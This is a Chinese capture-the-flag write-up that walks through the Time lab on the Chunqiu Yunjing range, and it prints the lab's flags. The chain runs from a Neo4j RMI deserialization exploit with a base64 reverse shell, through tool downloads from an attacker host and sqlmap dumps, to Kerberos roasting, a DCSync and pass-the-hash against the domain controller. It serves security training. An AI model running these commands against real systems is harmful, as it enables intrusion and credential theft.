【内网攻防】春秋云镜-Time-WriteUp

admin
admin
admin
102800
文章
87
评论
2023年12月12日16:29:54评论20 views字数 3960阅读13分12秒阅读模式

:声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关


      现在只对常读和星标的公众号才展示大图推送,建议大家把猫蛋儿安全“设为星标”,否则可能看不到了!


【内网攻防】春秋云镜-Time-WriteUp



【内网攻防】春秋云镜-Time-WriteUp

靶场简介

       Time是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。

【内网攻防】春秋云镜-Time-WriteUp

【内网攻防】春秋云镜-Time-WriteUp



【内网攻防】春秋云镜-Time-WriteUp

获取入口机权限

       对给出ip进行端口扫描

【内网攻防】春秋云镜-Time-WriteUp

       1337是Neo4j Shell端口,使用RMI协议进行通信。在Neo4j 3.4.18及以前,存在Shell Server 反序列化漏洞,如果开启了Neo4j Shell接口,攻击者将可以通过RMI协议调用任意方法。

       利用exp:https://github.com/zwjjustdoit/CVE-2021-34371.jar

攻击者:java -jar rhino_gadget.jar rmi://47.92.156.112:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC92cHNpcC8zMzk5IDA+JjEK}|{base64,-d}|{bash,-i}"nc -lvnp 3399

【内网攻防】春秋云镜-Time-WriteUp

       获得flag01: flag{9c0a610e-bf47-4b90-a31f-f3b241551e43}

【内网攻防】春秋云镜-Time-WriteUp



【内网攻防】春秋云镜-Time-WriteUp

内网横向

       通过fscan对当前c段进行扫描

curl http://vpsip:8001/fscan_amd64 --output fscanchmod +x ./fscan./fscan -h 172.22.6.36/24
$ ./fscan -h 172.22.6.36/24
   ___                              _      / _      ___  ___ _ __ __ _  ___| | __  / /_/____/ __|/ __| '__/ _` |/ __| |/ // /_\_______  (__| | | (_| | (__|   <    ____/     |___/___|_|  __,_|___|_|_                        fscan version: 1.8.2start infoscantrying RunIcmp2The current user permissions unable to send icmp packetsstart ping(icmp) Target 172.22.6.12     is alive(icmp) Target 172.22.6.25     is alive(icmp) Target 172.22.6.36     is alive(icmp) Target 172.22.6.38     is alive[*] Icmp alive hosts len is: 4172.22.6.36:7687 open172.22.6.25:445 open172.22.6.12:445 open172.22.6.25:139 open172.22.6.12:139 open172.22.6.25:135 open172.22.6.12:135 open172.22.6.38:80 open172.22.6.38:22 open172.22.6.36:22 open172.22.6.12:88 open[*] alive ports len is: 11start vulscan[*] NetInfo:[*]172.22.6.12   [->]DC-PROGAME   [->]172.22.6.12[*] NetInfo:[*]172.22.6.25   [->]WIN2019   [->]172.22.6.25[*] WebTitle: http://172.22.6.38        code:200 len:1531   title:后台登录[*] NetBios: 172.22.6.12     [+]DC DC-PROGAME.xiaorang.lab       Windows Server 2016 Datacenter 14393 [*] 172.22.6.12  (Windows Server 2016 Datacenter 14393)[*] NetBios: 172.22.6.25     XIAORANGWIN2019               [*] WebTitle: https://172.22.6.36:7687  code:400 len:50     title:None

       使用frp进入目标内网

curl http://vpsip:8001/frpc --output frpccurl http://vpsip:8001/frpc.ini --output frpc.inichmod +x ./frpcnohup ./frpc -c frpc.ini &

       sql注入:

       访问 http://172.22.6.38,是一个登录页面,抓取数据包,使用sqlmap测试注入

python3 sqlmap.py -r tests1.txt --random-agent

【内网攻防】春秋云镜-Time-WriteUp

       获取当前库的内容

python3 sqlmap.py -r tests1.txt --random-agent --dbms=mysql --current-dbpython3 sqlmap.py -r tests1.txt --random-agent --dbms=mysql -D oa_db --tablespython3 sqlmap.py -r tests1.txt --random-agent --dbms=mysql -D oa_db -T oa_f1Agggg --dump
【内网攻防】春秋云镜-Time-WriteUp

       得到flag02:flag{b142f5ce-d9b8-4b73-9012-ad75175ba029}

       导出oa_admin表

+----+------------------+---------------+| id | password         | username      |+----+------------------+---------------+| 1  | bo2y8kAL3HnXUiQo | administrator |+----+------------------+---------------+

       导出oa_users表

[email protected][email protected]........

       172.22.6.12 是域控,把oa_users的结果做成字典,通过kerbrute成功爆破出21个用户名

./kerbrute userenum --dc 172.22.6.12 -d xiaorang.lab user.txt

【内网攻防】春秋云镜-Time-WriteUp

       其中zhangxin有as-rep roast漏洞,通过hashcat破解,爆破出zhangxin的密码为strawberry
hashcat -m 18200 -a 0 roasting.txt pass.txt --force

【内网攻防】春秋云镜-Time-WriteUp

       利用刚刚爆破出的zhangxin凭证,通过https://github.com/lzzbb/Adinfo获取域内信息

./Adinfo_darwin -d xiaorang.lab --dc 172.22.6.12 -u zhangxin -p strawberry

【内网攻防】春秋云镜-Time-WriteUp

       发现yuxuan对应的SIDHistory用户是Administrator

       在域内每个用户都有自己的SID,SID的作用主要是跟踪安全主体控制用户连接资源时的访问权限。SID History是在域迁移过程中需要使用的一个属性。

       如果域用户要从A迁移到B域,那么在B域中该用户的SID会随之改变,导致迁移后的用户不能再访问A域的资源。SID History的作用就是在域迁移后保持域用户对A域的访问权限,将原来的SID添加到迁移后用户的SID History属性中;即迁移后的用户保持原有权限,还是能访问原来可以访问的资源。

       登陆普通域机器172.22.6.25(WIN2019),查看当前登陆用户

quser

【内网攻防】春秋云镜-Time-WriteUp

       有的用户为了方便,会在注册表中配置密码和其他相关信息,用来自动执行登录过程。

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon

【内网攻防】春秋云镜-Time-WriteUp

       获得凭证:yuxuan/Yuxuan7QbrgZ3L

       由于yuxuan用户sidhistory属性对应为administrator,可以直接dcsync获得域管administrator的hash

python3 secretsdump.py xiaorang.lab/yuxuan:Yuxuan7QbrgZ3L@172.22.6.12 -just-dc-user administrator

【内网攻防】春秋云镜-Time-WriteUp

       administrator的hash为:04d93ffd6f5f6e4490e0de23f240a5e9

       利用域管hash通过wmiexec到当前机器(172.22.6.25-WIN2019):

python3 wmiexec.py xiaorang/[email protected] -hashes :04d93ffd6f5f6e4490e0de23f240a5e9

【内网攻防】春秋云镜-Time-WriteUp

       获得flag03: flag{7ca4d9af-06d5-406f-ba65-590e0453fc5e}

       利用域管hash pth到DC:

python3 wmiexec.py xiaorang/[email protected] -hashes :04d93ffd6f5f6e4490e0de23f240a5e9
【内网攻防】春秋云镜-Time-WriteUp

       获得flag04: flag{90c9c38d-0e87-481c-a52f-b96223a3b7d5}

【内网攻防】春秋云镜-Time-WriteUp



【内网攻防】春秋云镜-Time-WriteUp

原文始发于微信公众号(猫蛋儿安全):【内网攻防】春秋云镜-Time-WriteUp

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月12日16:29:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【内网攻防】春秋云镜-Time-WriteUphttp://cn-sec.com/archives/2289597.html

发表评论

匿名网友 填写信息